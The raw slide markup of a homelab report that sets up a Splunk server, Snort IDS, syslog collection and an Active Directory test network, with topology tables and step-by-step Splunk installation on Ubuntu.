              <a:rPr dirty="0" sz="1100" spc="-9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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Boom.......................................................................................................25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 spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-85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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-8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3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>cap..........................................................................................................................25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 spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Final</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-8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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-195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95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>..............................................................................................................................27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 spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-9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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Dashboard:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-14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4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>...................................................................................................................27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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-8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 spc="75">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SOC</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-75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 spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Dashboard:......................................................................................................28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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-3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>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Message</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-15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 spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Querying:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="65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dirty="0" sz="1100" spc="-85">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>......................................................................................................28</a:t>
            </a:r>
            <a:endParaRPr sz="1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 spc="-80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Resources:.............................................................................................................................29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6853802"/>
            <a:ext cx="5854065" cy="229044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Resources:</a:t>
            </a:r>
            <a:endParaRPr sz="16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SzPct val="109090"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="469265" algn="l"/>
              </a:tabLst>
            </a:pP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Installing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Splunk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Enterprise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on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Ubuntu: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Step-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by-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Step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Guide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2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|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by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Daniel</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-9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Opara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2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|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Medium</a:t>
            </a:r>
            <a:endParaRPr sz="11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</a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1200" spc="-2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https://www.youtube.com/watch?v=z454piFK8W4</a:t>
            </a:r>
            <a:endParaRPr sz="12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109090"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="469265" algn="l"/>
              </a:tabLst>
            </a:pP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How</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-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to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install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and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set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up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Rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-9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server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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-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Linux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Ubuntu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20.04.1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(linkedin.com)</a:t>
            </a:r>
            <a:endParaRPr sz="11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9090"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="469265" algn="l"/>
              </a:tabLst>
            </a:pP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Ubuntu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22.04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LTS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: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Join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in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Active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Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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: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Server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World</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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dirty="0" u="sng" sz="11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(server-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world.info)</a:t>
            </a:r>
            <a:endParaRPr sz="11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109090"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="469265" algn="l"/>
              </a:tabLst>
            </a:pP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https://github.com/adot8/metro</a:t>
            </a:r>
            <a:endParaRPr sz="11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9090"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="469265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-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The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Basics</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-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-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Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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3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Rule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dirty="0" u="sng" sz="11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Writing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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7"/>
              </a:rPr>
              <a:t>Guide</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469265" marR="5080" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="109100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="469265" algn="l"/>
              </a:tabLst>
            </a:pP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GitHub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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1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chrisjd20/Snorpy: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Snorpy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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is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a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python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script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the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-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gives</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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a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Gui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interface</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-9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to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help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those</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-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new</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-10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to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-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snort</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-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create</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-9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8"/>
              </a:rPr>
              <a:t>rules.</a:t>
            </a:r>
            <a:endParaRPr sz="11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109090"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="469265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="11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9"/>
              </a:rPr>
              <a:t>JAH</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100" spc="-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9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9"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="1100"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9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9"/>
              </a:rPr>
              <a:t>MIGHTY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400" y="944880"/>
            <a:ext cx="5943600" cy="30716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4400" y="4131564"/>
            <a:ext cx="5943600" cy="27495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29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915670"/>
            <a:ext cx="34677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5">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Topology,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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-19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2000" spc="-17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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-17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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Tables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43076" y="5203571"/>
          <a:ext cx="6164580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/>
                <a:gridCol w="2027555"/>
                <a:gridCol w="2027555"/>
              </a:tblGrid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Machine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IP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1100" spc="-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dirty="0" sz="11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Role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</a:tr>
              <a:tr h="173355">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="68580">
                        <a:lnSpc>
                          <a:spcPts val="1250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Ubuntu1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192.168.1.100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Splunk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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server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Ubuntu2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192.168.1.101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Snort</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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55">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>IDS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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1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Syslog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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server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b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Windows</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1100" spc="-7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35" b="1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dirty="0" sz="1100" spc="-7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0" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>201G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192.168.1.103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Domain</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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30">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Controller</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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1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50">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>DNS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server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b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Windows</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1100" spc="-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10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192.168.1.110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dirty="0" sz="11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Desktop</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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1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environement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Kali</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1100" spc="-10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Linux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192.168.1.200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 spc="-60">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Threat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Actor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vRouter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192.168.1.2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 spc="-20">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Honeypot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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55">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>DHCP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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server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43076" y="6904608"/>
          <a:ext cx="6164580" cy="885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015"/>
                <a:gridCol w="3041015"/>
              </a:tblGrid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dirty="0" sz="1100" spc="-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Sources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</a:tr>
              <a:tr h="173355">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="68580">
                        <a:lnSpc>
                          <a:spcPts val="1250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Snort</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1100" spc="-10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55" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>IDS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1100" spc="-10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Alerts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0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Ubuntu2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100" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Windows</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1100" spc="-8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35" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Event</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1100" spc="-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0" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Logs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Windows</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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30">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>10,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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Windows</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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3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dirty="0" sz="11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0">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>2019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Syslog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Ubunt1,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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0">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Ubuntu2,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="11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vRouter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Apache2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Ubuntu2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30452"/>
            <a:ext cx="5939790" cy="3760343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746126"/>
            <a:ext cx="5826760" cy="131000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000" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Splunk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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Server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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Setup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-18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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-18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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Ubuntu1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Update</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-114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Repositories</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-114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2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Upgrade</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-11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Packages: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0000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>First,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made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sure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our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system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up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date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by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running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sudo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60" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>apt-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>get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update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sudo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60" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>apt-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-2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upgrade</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>.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This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ensured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that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had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latest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packages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repositories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ready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for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installation.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4696261"/>
            <a:ext cx="5744845" cy="146748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Create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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Splunk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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Account</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="16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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Download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Install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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Splunk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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Enterprise: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0000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Next,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went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ahead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created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account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website.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This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step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necessary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to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>access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free trial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version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Enterprise.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="84455">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Once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our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account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was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up,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downloaded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.deb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package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Enterprise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from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website.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With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package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hand,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installed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it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command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sudo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60" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>apt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install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 b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>./[splunkpackage].deb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-1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68651"/>
            <a:ext cx="3787775" cy="25506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276340"/>
            <a:ext cx="3792854" cy="248856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06998"/>
            <a:ext cx="5875020" cy="118046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65">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Accept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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>License</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-12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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Agreement</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="16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Start</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="16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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the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Service: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700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>After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installation,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navigated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application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file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located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10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/opt/splunk/bin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>.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Here,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accepted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license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agreement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started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service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sudo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./splunk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65" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>start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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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accept-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>license</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55" b="1" i="1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This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command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not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only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accepted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license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agreement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but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also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initiated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service.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="11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We</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-85">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>were</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-8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also</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-85">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>prompted</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-85">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-7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an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-8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admin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-8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username</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-7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and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1000" spc="-8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password.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4868472"/>
            <a:ext cx="5700395" cy="998219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600">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-14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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Splunk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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Web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Interface: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0000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>With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service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up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running,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opened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our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web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browser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visited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http://localhost:8000.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directed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login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page,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where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logged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proceed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further configuration.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00579"/>
            <a:ext cx="4190365" cy="27914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979210"/>
            <a:ext cx="5690234" cy="3047873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06998"/>
            <a:ext cx="5916295" cy="99631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Configure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Forwarding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Receiving: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500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Once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logged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into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Splunk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web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interface,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navigated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Settings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&gt;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Forwarding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10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> Receiving. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Here,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configured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receiving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settings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by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selecting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port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listen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for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logs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on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setting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up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>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>necessary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configurations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for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data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reception.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881030"/>
            <a:ext cx="5641340" cy="99631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Installing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-114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Additional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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Dashboard</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-11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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Apps: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500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>For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better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visualization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analysis,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also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installed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Snort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dashboard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app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optionally considered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installing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Windows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Event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Logs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dashboard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app.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These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apps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provided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with 